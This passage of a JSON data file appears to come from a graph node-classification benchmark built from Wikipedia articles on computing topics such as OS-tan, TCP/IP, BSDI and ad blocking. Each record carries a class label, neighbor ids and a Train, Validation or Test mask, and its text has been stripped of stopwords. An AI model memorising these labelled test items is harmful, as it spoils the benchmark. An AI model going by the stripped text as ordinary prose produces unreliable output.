xp vista 7 8 editions include memorial pack version without voice theme pack stickers 6191 units 64-bit windows memorial pack version sculpt mobile mouse nanami decor 810 units editions available preorder 2013-10-04 release date 2013-10-18 part market launch facebook draw 8 followers took place follower count reaches 80001 total twitter follower count yū ai reach 8001 winners receive yū- ai-themed prizes additional types windows 8.1 pro dsp edition madobe family theme packs also sold ark towerhill zoa corporation tsukumo project white dospara buy unit.com big camera sofmap pc one versions include two types wallpapers christmas new year theme pack system voices japanese windows 8 pro dsp editions released madobe yū yuu madobe ai editions windows navi+ techno-alliance corp. versions 4,000 units per character thus 8,000 total include microsoft wedge touch mouse windows 8 logo character-specific windows theme three theme pack wallpapers event sounds respective character voice picture password images addition limited akihabara editions 444 units per character 888 total sold tokyo akihabara shopping district include madobe ai/yū edition microsoft wedge touch mouse alternate character-specific event sound samples theme pack alternate wallpaper respective character nipponbashi versions 500 units per character sold nipponbashi osaka include microsoft wedge touch mouse ai yū decal three theme pack wall papers two common one character-specific yū ai event sounds nipponbashi packages include different art 32/64-bit version availability depends retailer asuka nishi voices short-haired yū nao tamura voices long-haired ai windows 8 edition unitcom available first 2,888 copies included notepad t-shirt two-way mouse pad pocket media case smart phone stand cleaning two-way pc cleaner yū ai badges freeze blanket extended fictional madobe family tree detailed yū older sister parents eiichi netsu 根津 family shii madobe family yū ai said birthdate 18 november 1996 windows ce release date age 15 height 152 cm conflicts back-story materials suggesting ai younger sister masatakap electrocutica produced windows 8 music video titled window featuring madobe characters nanami yū silhouette claudia video presented opening microsoft keynote second day windows developer days japan 2012 2013 windows navi+ techno-alliance corp. also created separate twitter accounts ai yū respectively two theme songs yū ai – mir8cle days donna mirai demo unveiled 15 june 2013 sold cd bundled windows 8 pro dsp edition sold twinbox akihabara akiba pc reported first 7777 copies japanese windows 7 ultimate dsp editions include special wallpaper sound sets character called voiced nana mizuki character designed wakaba premium set includes windows 7 theme featuring 3 nanami wallpapers 19 event sound sets cd 5 extra nanami sounds regular dsp edition includes digest windows 7 theme including nanami wallpaper event sound set preorder users also download extra nanami wallpaper 6 event sound sets makes first os- tan marketed company producing operating system addition character also got twitter account initial sales event windows 7 dsp edition official profile character also revealed shows madobe nanami born 1992-04-06 release date windows 3.1 17 years age time release lives chiyoda tokyo nanami among extended family 16 members elder brother named goichi 吾一 elder sister named mutsumi むつみ mother named mikaho 美佳穗 madobe 窓辺 family father named kyuuachi 究八 shirato 白戸 family nanami cousin claudia madobe クロード 蔵人 later appeared microsoft cloud girl comic strip windows vista distinguishing characteristic usually horn-shaped pigtails variants four pigtails heterochromatic eyes silver white hair appears frequent although light blue black also seen common costume design white red sailor fuku stockings since release details vista interface look changed slightly black maid outfit emerging popularity matches new default vista color scheme well circular windows logo hair clip identical new start menu button vista also seems finalized version hair colour similar vista wallpapers range light blue yellow green also wears type long coat covers left right sides transparent imitate aero glass effect xp- tan dark-haired girl ribbons hair xp hair ornament typically worn left side windows xp criticized bloating system pretty without useful xp- tan commonly depicted wearing tight clothing big breasts additionally reference memory usage windows xp often seen eating holding empty rice bowl labeled memory variants include version xp home known homeko green hair wears short ponytail two large xp-shaped hairclips cover ears well less common variation representing windows xp media center edition outfits worn two main variants based loading lines windows splash screen startup although variants exist common operating system represented windows 2000 professional typically drawn intelligent professional reserved looking woman short blue hair glasses hair clips resemble cat ears flanking small white bonnet ruffle similar maid bonnet shows windows logo outfit resembles swimsuit suggesting windows logo colors worn long blue coat alluding popular opinion windows 2000 stable dependable windows operating systems due greater stability win2k compared winme released near 2000 2k- tan often described guardian me- tan particular shade blue used drawings similar default windows 2000 desktop color design me- tan personification windows much line japanese concept kawaii cuteness design changed little artist original designs depicted green hair long pigtails wearing maid outfit badge front reminiscent windows active desktop recovery screen often shown rebooting system crash considered hard worker webcomics often depict failing anything tries often literally crashing irritating sisters frozen control tends things showing lack common sense knowledge putting soda microwave oven defending swinging welsh onion many variations exist common depiction windows 98 operating systems pair young girls os- tan representative original release windows 98 shown white blue uniform includes windows logo part neck tie navy blue hair 98 hair clip windows 98 second edition os- tan similar appearance wears green sailor school uniform letters se front two early representations also seen pair stick-limbed pocky boxes face version number drawn crayon reference vulcan 300 character zatch bell anime series early representations still used mecha piloted girls dolls carried girls sometimes even hiding places windows 95 considered oldest modern 32-bit windows operating systems usually represented traditional lady early modern era japan typically depicted gentle-looking brown haired woman kimono hair ribbon showing four windows colors outfit traditional kimono hakama japan wears thick sandals geta feet woman college student typical clothes seen earliest period course modernization japan meiji period taishō period reference modernization windows comparison modernization japan additionally pattern kimono based file hana256.bmp used desktop wallpaper pattern japanese version windows typically depicted engaged drinking tea serving meals housework one recurring theme stories unfamiliarity newer post win-95 technologies usb devices even though osr 2.x supported broadband internet connections also occasionally depicted wielding katana aggressive manner symbolizing generation operating systems microsoft finally achieved full dominance personal computer market windows 3.1 short girl long silver hair long light purple dress large purple bow head often seen carrying small black cat head well acts servant maid sort serves tends dos- tan reference fact windows 3.1 full operating system rather gui ms-dos mac os x girl often portrayed catgirl following apple wild cat naming tradition every mac os x release os x mavericks codename like jaguar panther tiger snow leopard etc. otherwise shown older variation mac os 9 girl wearing white coat wearing airport wireless hub fashioned hat occasionally shown holding publication sort macs often used desktop publishing originally seen bearded penguin reference tux penguin mascot linux kernel image girl helmet flippers chosen human alternative helmet likely metaphor linux kernel oft-claimed excellent security usually horns likely reference gnu software comprises common system programs present nearly linux distributions gear teeth helmet reference kde common desktop environment used gnu/linux shirt reference gnome another common desktop environment often seen spear flags attached representing grub lilo gcc tools linux artist drew konqi tyson tan submitted mascot libreoffice contest run document foundation late 2017 mascot officially accepted foundation developed fandom 8chan reddit msx-dos girl often portrayed young grey-haired girl carrying large cartridge-shaped bag msx-dos logo even short game featuring os- tan player character bag os- tan often shown holding cartridge-shaped likely msxdos2 required cartridge extra 64 kb rom order work americanized versions windows related os- tan named xp-usa me-usa 2k-usa published ohzora fanbook comic strip named trouble windows usa saint muscle heavy associations operating systems supporting programs anti-virus clients web browsers many supporting characters created personify applications examples wired news rated os- tan among lamest technology mascots ever yet strangely compelling",
    "neighbors": [
      704,
      321,
      1252,
      4326,
      11559,
      3496,
      8584,
      4074,
      6797,
      9166,
      1935,
      7983,
      82,
      11283,
      823,
      10872,
      8092,
      3167
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5527,
    "label": 9,
    "text": "Cryptol:cryptol cryptol domain specific programming language cryptography developed portland oregon based software development firm galois inc.. language originally developed use united states national security agency language also used private firms provide information technology systems american company rockwell collins provides aerospace defense contractors united states programming language used aspects developing using cryptography design implementation new ciphers verification existing cryptographic algorithms cryptol designed allow cryptographer watch stream processing functions program manipulate ciphers encryption algorithms",
    "neighbors": [
      9345,
      2691,
      9224,
      5395,
      9626,
      3613,
      4770,
      3876,
      3629,
      5680,
      9780,
      1591,
      4410,
      191,
      9926,
      4042,
      7887,
      5845,
      477,
      7395,
      4838,
      1768,
      9330,
      9331,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 5528,
    "label": 7,
    "text": "Monjin:monjin monjin digital interviewing assessment platform powered artificial intelligence described portmanteau skype linkedin monjin founded 2014 industry veterans abhijit kashyape ashutosh kulkarni aniruddha fansalkar prafulla paraskar company led abhijit 100 employees across globe 2016 monjin set operations uk usa sweden 2017 monjin partnered microsoft create first azure-based aggregator platform using interviewers create global assessment standard",
    "neighbors": [
      1935
    ],
    "mask": "Test"
  },
  {
    "node_id": 5529,
    "label": 3,
    "text": "Interrupt_latency:interrupt latency computing interrupt latency time elapses interrupt generated source interrupt serviced many operating systems devices serviced soon device interrupt handler executed interrupt latency may affected microprocessor design interrupt controllers interrupt masking operating system os interrupt handling methods usually trade-off interrupt latency throughput processor utilization many techniques cpu os design improve interrupt latency decrease throughput increase processor utilization techniques increase throughput may increase interrupt latency increase processor utilization lastly trying reduce processor utilization may increase interrupt latency decrease throughput minimum interrupt latency largely determined interrupt controller circuit configuration also affect jitter interrupt latency drastically affect real-time schedulability system intel apic architecture well known producing huge amount interrupt latency jitter maximum interrupt latency largely determined methods os uses interrupt handling example processors allow programs disable interrupts putting execution interrupt handlers order protect critical sections code execution critical section interrupt handlers execute safely within critical section blocked save minimum amount information required restart interrupt handler critical sections exited interrupt latency blocked interrupt extended end critical section plus interrupts equal higher priority arrived block place many computer systems require low interrupt latencies especially embedded systems need control machinery real-time sometimes systems use real-time operating system rtos rtos makes promise specified maximum amount time pass executions subroutines order rtos must also guarantee interrupt latency never exceed predefined maximum advanced interrupt controllers implement multitude hardware features order minimize overhead context switches effective interrupt latency include features like also many methods hardware may use help lower requirements shorter interrupt latency order make given interrupt latency tolerable sitation include buffers flow control example network cards implement transmit receive ring buffers interrupt rate limiting hardware flow control buffers allow data stored transferred flow control allows network card pause communications without discard data buffer full modern hardware also implements interrupt rate limiting helps prevent interrupt storms live-lock hardware wait programmable minimum amount time interrupt generates interrupt rate limiting reduces amount time spent servicing interrupts allowing processor spend time useful work exceeding time results soft recoverable hard non-recoverable error",
    "neighbors": [
      7173,
      9105,
      5270,
      6806,
      1176,
      9366,
      1058,
      4773,
      7983,
      4918,
      10813,
      5823,
      2623,
      3010,
      9932,
      5457,
      3157,
      3294,
      5862,
      1660
    ],
    "mask": "None"
  },
  {
    "node_id": 5530,
    "label": 9,
    "text": "Quantum_(statistical_programming_language):quantum statistical programming language quantum software package programming language statistical survey data validation manipulation tabulation originally developed quantime run unix systems incorporated spss inc. spss mr product line acquisition quantime september 1997",
    "neighbors": [
      522,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 5531,
    "label": 5,
    "text": "Internet_protocol_suite:internet protocol suite internet protocol suite conceptual model set communications protocols used internet similar computer networks commonly known tcp/ip foundational protocols suite transmission control protocol tcp internet protocol ip occasionally known department defense dod model development networking method funded united states department defense darpa internet protocol suite provides end-to-end data communication specifying data packetized addressed transmitted routed received functionality organized four abstraction layers classify related protocols according scope networking involved lowest highest layers link layer containing communication methods data remains within single network segment link internet layer providing internetworking independent networks transport layer handling host-to-host communication application layer providing process-to-process data exchange applications technical standards underlying internet protocol suite constituent protocols maintained internet engineering task force ietf internet protocol suite predates osi model comprehensive reference framework general networking systems internet protocol suite resulted research development conducted defense advanced research projects agency darpa late 1960s initiating pioneering arpanet 1969 darpa started work number data transmission technologies 1972 robert e. kahn joined darpa information processing technology office worked satellite packet networks ground-based radio packet networks recognized value able communicate across spring 1973 vinton cerf helped develop existing arpanet network control program ncp protocol joined kahn work open-architecture interconnection models goal designing next protocol generation arpanet summer 1973 kahn cerf worked fundamental reformulation differences local network protocols hidden using common internetwork protocol instead network responsible reliability arpanet function delegated hosts cerf credits hubert zimmermann louis pouzin designer cyclades network important influences design protocol implemented transmission control program first published 1974 initially tcp managed datagram transmissions routing protocol grew researchers recommended division functionality protocol layers advocates included jonathan postel university southern california information sciences institute edited request comments rfcs technical strategic document series documented catalyzed internet development postel stated screwing design internet protocols violating principle layering encapsulation different mechanisms intended create environment upper layers could access needed lower layers monolithic design would inflexible lead scalability issues transmission control program split two distinct protocols transmission control protocol internet protocol design network included recognition provide functions efficiently transmitting routing traffic end nodes intelligence located edge network end nodes design known end-to-end principle using design became possible connect almost network arpanet irrespective local characteristics thereby solving kahn initial internetworking problem one popular expression tcp/ip eventual product cerf kahn work run two tin cans string years later joke ip avian carriers formal protocol specification created successfully tested computer called router provided interface network forwards network packets back forth originally router called gateway term changed avoid confusion types gateways 1973 1974 cerf networking research group stanford worked details idea resulting first tcp specification significant technical influence early networking work xerox parc produced parc universal packet protocol suite much existed around time darpa contracted bbn technologies stanford university university college london develop operational versions protocol different hardware platforms four versions developed tcp v1 tcp v2 tcp v3 ip v3 tcp/ip v4 last protocol still use today 1975 two-network tcp/ip communications test performed stanford university college london november 1977 three-network tcp/ip test conducted sites us uk norway several tcp/ip prototypes developed multiple research centers 1978 1983 march 1982 us department defense declared tcp/ip standard military computer networking year peter t. kirstein research group university college london adopted protocol migration arpanet tcp/ip officially completed flag day january 1 1983 new protocols permanently activated 1985 internet advisory board later internet architecture board held three-day tcp/ip workshop computer industry attended 250 vendor representatives promoting protocol leading increasing commercial use 1985 first interop conference focused network interoperability broader adoption tcp/ip conference founded dan lynch early internet activist beginning large corporations ibm dec attended meeting ibm dec first major corporations adopt tcp/ip despite competing proprietary protocols ibm 1984 barry appelman group tcp/ip development navigated corporate politics get stream tcp/ip products various ibm systems including mvs vm os/2 time several smaller companies ftp software wollongong group began offering tcp/ip stacks dos microsoft windows first vm/cms tcp/ip stack came university wisconsin early tcp/ip stacks written single-handedly programmers jay elinsky ibm research wrote tcp/ip stacks vm/cms os/2 respectively 1984 donald gillies mit wrote ntcp multi-connection tcp ran atop ip/packetdriver layer maintained john romkey mit 1983-4 romkey leveraged tcp 1986 ftp software founded starting 1985 phil karn created multi-connection tcp application ham radio systems ka9q tcp spread tcp/ip fueled june 1989 university california berkeley agreed place tcp/ip code developed bsd unix public domain various corporate vendors including ibm included code commercial tcp/ip software releases microsoft released native tcp/ip stack windows 95 event helped cement tcp/ip dominance protocols microsoft-based networks included ibm systems network architecture sna platforms digital equipment corporation decnet open systems interconnection osi xerox network systems xns british academic network janet converted tcp/ip 1991 end-to-end principle evolved time original expression put maintenance state overall intelligence edges assumed internet connected edges retained state concentrated speed simplicity real-world needs firewalls network address translators web content caches like forced changes principle robustness principle states general implementation must conservative sending behavior liberal receiving behavior must careful send well-formed datagrams must accept datagram interpret e.g. object technical errors meaning still clear second part principle almost important software hosts may contain deficiencies make unwise exploit legal obscure protocol features encapsulation used provide abstraction protocols services encapsulation usually aligned division protocol suite layers general functionality general application highest level model uses set protocols send data layers data encapsulated level early architectural document emphasizes architectural principles layering rfc 1122 titled host requirements structured paragraphs referring layers document refers many architectural principles emphasize layering loosely defines four-layer model layers names numbers follows link layer networking scope local network connection host attached regime called link tcp/ip literature lowest component layer internet protocols tcp/ip designed hardware independent result tcp/ip may implemented top virtually hardware networking technology link layer used move packets internet layer interfaces two different hosts link processes transmitting receiving packets given link controlled software device driver network card well firmware specialized chipsets perform data link functions adding packet header prepare transmission actually transmit frame physical medium tcp/ip model includes specifications translating network addressing methods used internet protocol link layer addresses media access control mac addresses aspects level however implicitly assumed exist link layer explicitly defined tcp/ip model link layer also layer packets may selected sent virtual private network networking tunnels scenario link layer data may considered application data traverses another instantiation ip stack transmission reception another ip connection connection virtual link may established transport protocol even application scope protocol serves tunnel link layer protocol stack thus tcp/ip model dictate strict hierarchical encapsulation sequence link layer tcp/ip model corresponding functions layer 2 open systems interconnection osi model internet layer responsibility sending packets across potentially multiple networks internetworking requires sending data source network destination network process called routing internet protocol performs two basic functions internet layer agnostic data structures transport layer also distinguish operation various transport layer protocols ip carries data variety different upper layer protocols protocols identified unique protocol number example internet control message protocol icmp internet group management protocol igmp protocols 1 2 respectively protocols carried ip icmp used transmit diagnostic information igmp used manage ip multicast data layered top ip perform internetworking functions illustrates differences architecture tcp/ip stack internet osi model tcp/ip model internet layer corresponds layer three open systems interconnection osi model referred network layer internet layer provides unreliable datagram transmission facility hosts located potentially different ip networks forwarding transport layer datagrams appropriate next-hop router relaying destination functionality internet layer makes possible internetworking interworking different ip networks essentially establishes internet internet protocol principal component internet layer defines two addressing systems identify network hosts computers locate network original address system arpanet successor internet internet protocol version 4 ipv4 uses 32-bit ip address therefore capable identifying approximately four billion hosts limitation eliminated 1998 standardization internet protocol version 6 ipv6 uses 128-bit addresses ipv6 production implementations emerged approximately 2006 transport layer establishes basic data channels applications use task-specific data exchange layer establishes host-to-host connectivity meaning provides end-to-end message transfer services independent structure user data logistics exchanging information particular specific purpose independent underlying network protocols layer may provide error control segmentation flow control congestion control application addressing port numbers end-to-end message transmission connecting applications transport layer categorized either connection-oriented implemented tcp connectionless implemented udp purpose providing process-specific transmission channels applications layer establishes concept network port numbered logical construct allocated specifically communication channels application needs many types services port numbers standardized client computers may address specific services server computer without involvement service announcements directory services ip provides best effort delivery transport layer protocols offer reliability however ip run reliable data link protocol high-level data link control hdlc example tcp connection-oriented protocol addresses numerous reliability issues providing reliable byte stream newer stream control transmission protocol sctp also reliable connection-oriented transport mechanism message-stream-oriented—not byte-stream-oriented like tcp—and provides multiple streams multiplexed single connection also provides multi-homing support connection end represented multiple ip addresses representing multiple physical interfaces one fails connection interrupted developed initially telephony applications transport ss7 ip also used applications user datagram protocol connectionless datagram protocol like ip best effort unreliable protocol reliability addressed error detection using weak checksum algorithm udp typically used applications streaming media audio video voice ip etc on-time arrival important reliability simple query/response applications like dns lookups overhead setting reliable connection disproportionately large real-time transport protocol rtp datagram protocol designed real-time data streaming audio video applications given network address distinguished tcp udp port convention certain well known ports associated specific applications tcp/ip model transport host-to-host layer corresponds roughly fourth layer open systems interconnection osi model also called transport layer application layer includes protocols used applications providing user services exchanging application data network connections established lower level protocols may include basic network support services protocols routing host configuration examples application layer protocols include hypertext transfer protocol http file transfer protocol ftp simple mail transfer protocol smtp dynamic host configuration protocol dhcp data coded according application layer protocols encapsulated transport layer protocol units tcp udp messages turn use lower layer protocols effect actual data transfer tcp/ip model consider specifics formatting presenting data define additional layers application transport layers osi model presentation session layers functions realm libraries application programming interfaces application layer protocols generally treat transport layer lower protocols black boxes provide stable network connection across communicate although applications usually aware key qualities transport layer connection end point ip addresses port numbers application layer protocols often associated particular client-server applications common services well-known port numbers reserved internet assigned numbers authority iana example hypertext transfer protocol uses server port 80 telnet uses server port 23 clients connecting service usually use ephemeral ports i.e. port numbers assigned duration transaction random specific range configured application transport layer lower-level layers unconcerned specifics application layer protocols routers switches typically examine encapsulated traffic rather provide conduit however firewall bandwidth throttling applications must interpret application data example resource reservation protocol rsvp also sometimes necessary network address translator nat traversal consider application payload application layer tcp/ip model often compared equivalent combination fifth session sixth presentation seventh application layers open systems interconnection osi model furthermore tcp/ip model distinguishes user protocols support protocols support protocols provide services system network infrastructure user protocols used actual user applications example ftp user protocol dns support protocol following table shows various networking models number layers varies three seven networking models textbooks secondary sources may conflict intent rfc 1122 ietf primary sources three top layers osi model i.e application layer presentation layer session layer distinguished separately tcp/ip model application layer transport layer pure osi protocol applications x.400 also combined requirement tcp/ip protocol stack must impose monolithic architecture transport layer example nfs application protocol runs external data representation xdr presentation protocol turn runs protocol called remote procedure call rpc rpc provides reliable record transmission safely use best-effort udp transport different authors interpreted tcp/ip model differently disagree whether link layer entire tcp/ip model covers osi layer 1 physical layer issues whether hardware layer assumed link layer several authors attempted incorporate osi model layers 1 2 tcp/ip model since commonly referred modern standards example ieee itu often results model five layers link layer network access layer split osi model layers 1 2 ietf protocol development effort concerned strict layering protocols may fit cleanly osi model although rfcs sometimes refer often use old osi layer numbers ietf repeatedly stated internet protocol architecture development intended osi-compliant rfc 3439 addressing internet architecture contains section entitled layering considered harmful example session presentation layers osi suite considered included application layer tcp/ip suite functionality session layer found protocols like http smtp evident protocols like telnet session initiation protocol sip session layer functionality also realized port numbering tcp udp protocols cover transport layer tcp/ip suite functions presentation layer realized tcp/ip applications mime standard data exchange conflicts apparent also original osi model iso 7498 considering annexes model e.g. iso 7498/4 management framework iso 8648 internal organization network layer ionl ionl management framework documents considered icmp igmp defined layer management protocols network layer like manner ionl provides structure subnetwork dependent convergence facilities arp rarp ietf protocols encapsulated recursively demonstrated tunneling protocols generic routing encapsulation gre gre uses mechanism osi uses tunneling network layer internet protocol suite presume specific hardware software environment requires hardware software layer exists capable sending receiving packets computer network result suite implemented essentially every computing platform minimal implementation tcp/ip includes following internet protocol ip address resolution protocol arp internet control message protocol icmp transmission control protocol tcp user datagram protocol udp internet group management protocol igmp addition ip icmp tcp udp internet protocol version 6 requires neighbor discovery protocol ndp icmpv6 igmpv6 often accompanied integrated ipsec security layer application programmers typically concerned interfaces application layer often also transport layer layers services provided tcp/ip stack operating system ip implementations accessible programmers sockets apis unique implementations include lightweight tcp/ip open source stack designed embedded systems ka9q nos stack associated protocols amateur packet radio systems personal computers connected via serial lines microcontroller firmware network adapter typically handles link issues supported driver software operating system non-programmable analog digital electronics normally charge physical components link layer typically using application-specific integrated circuit asic chipset network interface physical standard high-performance routers large extent based fast non-programmable digital electronics carrying link level switching",
    "neighbors": [
      4609,
      10242,
      1541,
      1030,
      11269,
      6152,
      9233,
      7187,
      5652,
      8211,
      6681,
      26,
      6682,
      10270,
      10271,
      6689,
      9251,
      2085,
      7717,
      7208,
      7214,
      8238,
      7217,
      562,
      1586,
      9269,
      1081,
      11321,
      3133,
      1086,
      5181,
      6723,
      11332,
      8265,
      3150,
      4687,
      592,
      10851,
      10341,
      10853,
      10344,
      9834,
      3695,
      4723,
      5749,
      2679,
      2168,
      4729,
      124,
      2685,
      5246,
      5251,
      649,
      9868,
      2701,
      6797,
      3727,
      3218,
      9365,
      5270,
      9367,
      152,
      11413,
      3742,
      2208,
      2211,
      6308,
      9380,
      9381,
      3751,
      3752,
      8360,
      8871,
      172,
      10924,
      6318,
      6837,
      9909,
      4793,
      7865,
      4797,
      702,
      8386,
      7364,
      11461,
      8905,
      1229,
      5843,
      8404,
      10461,
      7391,
      3297,
      11489,
      3299,
      1253,
      3813,
      1256,
      2797,
      4333,
      751,
      8432,
      8946,
      2804,
      3322,
      4349,
      6403,
      9987,
      3847,
      2827,
      6419,
      10005,
      3350,
      5402,
      5405,
      8989,
      3872,
      9506,
      8998,
      8487,
      9511,
      11566,
      7984,
      10035,
      4918,
      2359,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      4423,
      6985,
      10058,
      6992,
      849,
      6993,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      11103,
      3941,
      871,
      11112,
      361,
      367,
      6000,
      5492,
      8054,
      10104,
      891,
      6524,
      11647,
      10115,
      4490,
      6541,
      7053,
      7570,
      11673,
      8606,
      10144,
      8610,
      10659,
      2980,
      933,
      2983,
      2476,
      6577,
      2996,
      6075,
      10171,
      3006,
      4543,
      8640,
      11198,
      4546,
      9670,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      4589,
      5102,
      6651,
      3580,
      10238,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5532,
    "label": 4,
    "text": "Web_Sheriff:web sheriff web sheriff anti-piracy company based united kingdom provides intellectual property copyright privacy rights protection services company monitors various websites host links downloads music film web sheriff operation since 2000 two offices uk company founded intellectual property lawyer john giacobbi acts managing director web sheriff sends legal take-down notice bittorrent file sharing sites according los angeles times web sheriff leading advocate soft sell anti-piracy industry web sheriff performs various copy protection services include protection copyright infringement libel cyber-bullying identity theft privacy issues social media policing trading sites recovery fraudulently registered domain names also furnishes online security concert tours web sheriff uses proprietary software web crawler programs search internet using human auditing determine type site posting clients copyrighted material relies heavily phone calls relationship building locating unauthorized links targets persons running sites supposed offending party sent take-down notice action taken torrent sites file sharing sites mediafire rapidshare provide access company remove infringing content los angeles times described company approach representing sharp turn recording industry life-and-death struggle piracy one driven largely performers managers rather record companies contracts protect new music releases company encourages artists represents give fans several tracks ahead release web sheriff founded 2000 former music attorney industry consultant john giacobbi 2005 company responsible removal ken bigley execution footage videos posted terrorist website bigley beheading web sheriff related approached mail sunday authorities refused intervene citing lack power video hosted website entitled headlessamericans.com isp initially refused take saying protected freedom speech complied finally 48 hours argument year work done mail sunday company spokesman writing newspaper disclosed web sheriff also closed extreme pornographic strangulation sites center notorious jane longhurst murder case web sheriff hired prince september 2007 help disappear entirely internet star spokesman related prince believes strongly artist music rights must remain artist thus copyrights protected across board artists ever taken kind action rights web sheriff announced would launch lawsuits youtube ebay pirate bay behalf prince refused compliance removing links unauthorized photos videos music peter sunde co-founder pirate bay dismissed threats stating american law applicable sweden youtube complied removing 2,000 videos site ebay removed 300 auctions november 2007 three fans sites given notice remove images singer lyrics anything linked prince likeness prince fans fought back formed organization called prince fans united hired attorney multiple unauthorized overseas online sites selling merchandise featuring prince shut 2008 company hired bryan adams take fan sites tribute bands well owner domain name pointlookout.com nothing artist company hired axl rose remove unflattering picture claiming copyright belonged axl rose photographer music fans bloggers often initially respond angrily first approached web sheriff clients official unofficial forums according evening standard music blogging sites littered comments sheriff contact details top thanking bloggers obeying rules fans sometimes interpret web sheriff saying 've got eye company reports eventually fans tend respect wishes favored artists cooperating related guardian prodigy fans brainkiller forum engaged web sheriff thread lasted 18 pages fans hostile beginning asked could help band web sheriff method using velvet glove approach appeal fans said randy lewis los angeles times notable successes including lady gaga born way adele 21 journalist also notes despite examples success diplomatic strategy company gentle approach still skeptics critics calling naive brad buckles executive copyright enforcement riaa quoted saying certainly well-intended may work cases problem many many cases 're dealing people respect whatsoever intellectual property record labels artists billboard journalist concludes appeal sites post links unauthorized music engaging fans redirecting authorized content artist strategy future implemented properly",
    "neighbors": [
      113
    ],
    "mask": "None"
  },
  {
    "node_id": 5533,
    "label": 1,
    "text": "International_Medical_Education_Directory:international medical education directory international medical education directory imed public database worldwide medical schools imed published joint collaboration educational commission foreign medical graduates ecfmg foundation advancement international medical education research faimer information available imed derived data collected educational commission foreign medical graduates ecfmg throughout history evaluating medical education credentials international medical graduates using data starting point foundation advancement international medical education research faimer began developing imed 2001 made publicly available april 2002 april 2014 imed merged avicenna directory create world directory medical schools world directory definitive list medical schools world imed avicenna discontinued 2015",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 5534,
    "label": 2,
    "text": "Berkeley_Software_Design:berkeley software design berkeley software design inc. bsdi later bsdi corporation developed sold licenses supported bsd/os originally known bsd/386 commercial partially proprietary variant bsd unix operating system pc compatible later computer systems name chosen similarity berkeley software distribution source primary product specifically 4.3bsd networking release 2 bsdi founded rick adams members computer systems research group csrg university california berkeley including keith bostic kirk mckusick mike karels bill jolitz donn seeley jolitz seeley trent hein working rick adam uunet time became bsdi first employees company began operations 1991 december 1991 usenix secretary former head software convex computer rob kolstad university illinois hired would take company operations two years later bsd/386 released january 1992 full system including source code retailed 995 affordable equivalent source code license rival unix system v cost 20,000 late 1980s rob kolstad direction company decided pursue internet infrastructure primary customer audience mid 1990s top-10 websites world almost using bsd/386 bsd source codebase late 1991 unix system laboratories usl brought lawsuit bsdi alleging bsd/386 contained proprietary trade secrets source code usl acquired novell settlement reached january 1994 bsdi agreed base future releases product called bsd/os csrg 4.4bsd-lite release declared free usl intellectual property rob kolstad university illinois convex computer corporation president bsdi period headed company close decade 1999 bsdi employees sought initial public offering installed new president reach goal soon possible given recent success red hat ipo linux market unfortunately strategy successful soon rob kolstad exited company facing bankruptcy 2000 company merged walnut creek cdrom distributor freeware open source software cd-rom shortly acquired telenet system solutions inc. internet infrastructure server supplier 2001 severe financial pressure excessive leverage bsdi known bsdi time sold software business unit comprising bsd/os former walnut creek freebsd slackware linux open source offerings wind river systems renamed remainder ixsystems renewed focus server hardware wind river dropped sponsorship slackware soon afterwards freebsd unit divested separate entity freebsd mall inc. 2002 faced competition open-source bsd- linux-based operating systems wind river discontinued bsd/os december 2003 many technologies live community-led bsd derivatives like freebsd 2002 offmyserver acquired ixsystems hardware business reverted ixsystems name 2005",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      10761,
      2061,
      9743,
      657,
      6675,
      8725,
      2584,
      1316,
      684,
      4908,
      1839,
      7983,
      2995,
      1718,
      823,
      1080,
      9151,
      9153,
      3651,
      7748,
      10436,
      9927,
      8395,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      8671,
      9320,
      873,
      9452,
      9455,
      6129,
      5492,
      633,
      8316
    ],
    "mask": "Test"
  },
  {
    "node_id": 5535,
    "label": 7,
    "text": "Citrix_Workspace:citrix workspace citrix workspace formerly citrix workspace suite digital workspace software platform developed citrix systems allows multiple users remotely access operate microsoft windows desktops running datacenter public private cloud via devices located elsewhere users able access virtual desktops applications citrix workspace app applications delivered managed via citrix virtual apps virtualization technology led xendesktop first developed 2000 open-source hypervisor research project led ian pratt university cambridge called xen project x86 pratt founded company called xensource 2004 made commercial version xen hypervisor 2007 citrix acquired xensource releasing xendesktop version 2.0 2008 company continues release updated versions xendesktop 7.6 featuring hdx technology enhancements audio video graphics user experience well reduction storage costs associated virtual desktop deployments result improvements citrix provisioning services 2018 software renamed citrix workspace product aim give employees ability work anywhere cutting information technology management costs desktops applications centralized xendesktop also aims provide security data stored devices end users instead saved centralized datacenter cloud infrastructure citrix developed software use medium large enterprise customers citrix workspace able manage deliver applications desktops using connection broker called desktop delivery controller supports multiple hypervisors including citrix hypervisor vmware vsphere microsoft hyper-v nutanix acropolis create virtual machines run applications desktops software allows several types delivery methods compatible multiple architectures including desktops servers datacenters private public hybrid clouds virtualized applications delivered virtual desktops using virtual apps",
    "neighbors": [
      3584,
      4194,
      5732,
      1801,
      6797,
      3822,
      7983,
      5371
    ],
    "mask": "None"
  },
  {
    "node_id": 5536,
    "label": 4,
    "text": "Ad_blocking:ad blocking ad blocking ad filtering software capability removing altering online advertising web browser application popular ad blocking tools browser extensions methods also available online advertising exists variety forms including web banners pictures animations embedded audio video text pop-up windows employ audio video autoplay browsers offer ways remove alter advertisements either targeting technologies used deliver ads embedded content delivered browser plug-ins via html5 targeting urls source ads targeting behaviors characteristic ads use html5 autoplay audio video standpoint internet user various fundamental reasons one would want use ad blocking addition manipulated brands publishers representative trade bodies hand argue web ads provide revenue website owners enable website owners create otherwise purchase content website publishers claim prevalent use ad blocking software devices could adversely affect website owner revenue thus turn lower availability free content websites users benefits ad blocking software include quicker loading cleaner looking web pages fewer distractions lower resource waste bandwidth cpu memory etc privacy benefits gained exclusion tracking profiling systems ad delivery platforms blocking ads also save substantial amounts electrical energy lower users power bills additional energy savings also expected grid level fewer data packets need transmitted user machine website server ad blocking software may benefits users quality life decreases internet users exposure advertising marketing industries promote purchase numerous consumer products services potentially harmful unhealthy creating urge buy immediately unwanted advertising also harm advertisers users become annoyed ads irritated users might make conscious effort avoid goods services firms using annoying pop-up ads block web content 